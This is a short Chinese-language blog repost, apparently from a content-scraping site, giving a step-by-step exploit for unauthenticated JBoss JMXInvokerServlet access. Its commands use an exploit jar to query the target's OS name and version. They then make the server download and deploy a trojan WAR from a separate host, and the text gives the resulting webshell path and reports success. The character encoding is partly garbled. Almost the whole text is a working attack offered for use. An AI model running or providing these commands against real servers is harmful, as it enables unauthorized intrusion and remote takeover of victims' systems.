查看系統(tǒng)名稱

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

查看系統(tǒng)版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion

3.遠(yuǎn)程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

獲得shell地址:
www.any.com:8080/no/index.jsp

成功！

轉(zhuǎn)載于:https://www.cnblogs.com/n00p/p/8951922.html

總結(jié)

以上是生活随笔為你收集整理的Jboss未授权访问部署木马 利用exp的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。